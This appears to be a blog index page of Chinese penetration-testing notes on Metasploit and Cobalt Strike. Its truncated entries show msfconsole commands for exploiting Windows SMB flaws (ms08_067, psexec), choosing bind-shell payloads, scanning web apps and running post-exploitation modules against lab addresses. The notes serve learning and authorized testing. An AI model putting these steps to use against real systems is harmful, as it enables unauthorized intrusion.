Metasploit
文章平均质量分 66
AA8j
Who Am I-Kein System ist sicher
展开
-
【渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】
会话管理1.CS会话派生到CS首先新建一个监听器用于监听派生的会话右键要派生的会话点击spawn然后选择派生到刚刚新建的监听器上,点击choose即可。也可以先连接其它cs服务器新建监听器,将会话派生到其它cs服务器上2.CS会话派生到MSF开启MSF监听:在CS上创建监听器并指向MSF监听的地址:通过Spawn将已有会话派生到新创建的监听器中:可以看到会话成功派生到了MSF上:3.MSF派生CS会话1.生成木马直接回连到CSCS新建原创 2021-06-29 20:18:11 · 314 阅读 · 1 评论 -
【Metasploit总结】之【后渗透】
后渗透简单使用普通session此时已经获取到session1,以enum_drives后渗透模块为例:msf6 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/forensics/enum_drives msf6 post(windows/gather/forensics/enum_drives) > set session 1session => 1msf6 post(windows/gathe原创 2020-12-12 17:12:52 · 1140 阅读 · 0 评论 -
【Metasploit总结】之【payload】
payload发现漏洞后,如何选择payload。典型payload使用exploitmsf6 > use exploit/windows/smb/ms08_067_netapi查看当前漏洞可利用payloadmsf6 exploit(windows/smb/ms08_067_netapi) > show payloads查看payload信息msf6 exploit(windows/smb/ms08_067_netapi) > info windows/s原创 2020-12-12 11:24:34 · 1265 阅读 · 1 评论 -
【Metasploit总结】之【Web相关】
Web渗透Web应用漏洞扫描探测Wmap一个允许用户配置辅助模块的集中扫描器;msf6 > load wmap# 加载插件(卸下unload)msf6 > help# 查看帮助msf6 > wmap_sites -a http://192.168.172.131# 添加站点msf6 > wmap_sites -l# 查看已添加站点及id号msf6 > wmap_targets -d 0# 添加目标,-d [id号]msf6 > wmap_ta原创 2020-12-12 10:06:42 · 377 阅读 · 1 评论 -
【Metasploit总结】之【MSF常用命令及信息收集】
初识MSFsmfconsole常用命令msfconsole下可以直接使用终端命令,如ping等msfdb start# 启动msf数据库,msf数据库是使用的postgresql的5432端口,新版本的postgresql是5433无法使用,需要到/etc/postgresql/13/main/postgresql.conf下修改为5432端口msfconsole -q# 启动msfconsole(-q为安静启动)db_status# 查看数据库状态,若显示no connect,先exit原创 2020-12-10 10:11:35 · 3904 阅读 · 1 评论 -
【渗透测试笔记】之【初探MSF】
主目录:/usr/share/metasploit-framework基本模块介绍exploit攻击方法。auxiliary用于信息搜集、枚举、指纹探测、扫描等。payloads攻击载荷。singles:体积大功能全的攻击载荷。stagers:体积小,用于建立网络连接。stages:用于stagers建立连接后,后续的攻击载荷。encoders对payloads进行加密,躲避AV。nops提高payloads的稳定性。基本使用方法启动1.终端输入msfconsol原创 2020-11-05 08:19:16 · 282 阅读 · 0 评论 -
【渗透测试笔记】之【MSF 生成payload】
生成payload# 查看所有payloadsshow payloads# 查看windows可用(输完按两下回车)use payload/windows/# 使用绑定端口payloadmsf5 > use payload/windows/shell_bind_tcp# 查看payload编码,里面可能含有“坏字符”msf5 payload(windows/shell_bind_tcp) > generate# 对坏字符编码(默认自动选择一个最合适的encoder,也可以手动指原创 2020-11-07 10:43:38 · 777 阅读 · 0 评论 -
【渗透测试笔记】之【MSF 弱点扫描】
弱点扫描HTTP常见弱点查看证书是否过期msf5 > use auxiliary/scanner/http/cert显示目录及文件目录msf5 > use auxiliary/scanner/http/dir_listing文件爆破msf5 auxiliary(scanner/http/dir_listing) > use auxiliary/scanner/http/files_dirmsf5 auxiliary(scanner/http/files_dir) &原创 2020-11-19 12:28:15 · 488 阅读 · 0 评论 -
【渗透测试笔记】之【MSF Exploit模块】
ExploitActive exploit主动连接,需要目标关闭防火墙。win8利用smb漏洞演示:# 使用漏洞模块msf5 > use exploit/windows/smb/psexec# 查看选项msf5 exploit(windows/smb/psexec) > show options# 配置必要参数(目标主机地址,用户名密码等)msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.172.132msf5原创 2020-11-05 10:02:32 · 1132 阅读 · 0 评论 -
【渗透测试笔记】之【MSF Meterpreter Payload】
Meterpreter高级、动态、可扩展的payload。完全基于内存的DLL注入式payload(不写硬盘)。将自身注入系统进程并建立stager。基于stager上传和预加载DLL进行扩展模块的注入(客户端API)。基于stager建立的socket基础上再建立加密的TLS/1.0通信隧道。利用TLS隧道进一步加载后续扩展模块。(避免网络取证)服务器使用C语言编写。客户端提供基于Ruby的全特性API(支持任何语言)。...原创 2020-11-07 16:08:22 · 601 阅读 · 0 评论 -
【渗透测试笔记】之【MSF 信息搜集】
Nmapmsf5 > db_nmap -sV 192.168.172.130[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST[*] Nmap: Nmap scan report for 192.168.172.130[*] Nmap: Host is up (0.0011s latency).[*] Nmap: Not shown: 997 closed ports[*] Nmap: POR原创 2020-11-11 14:20:25 · 1414 阅读 · 0 评论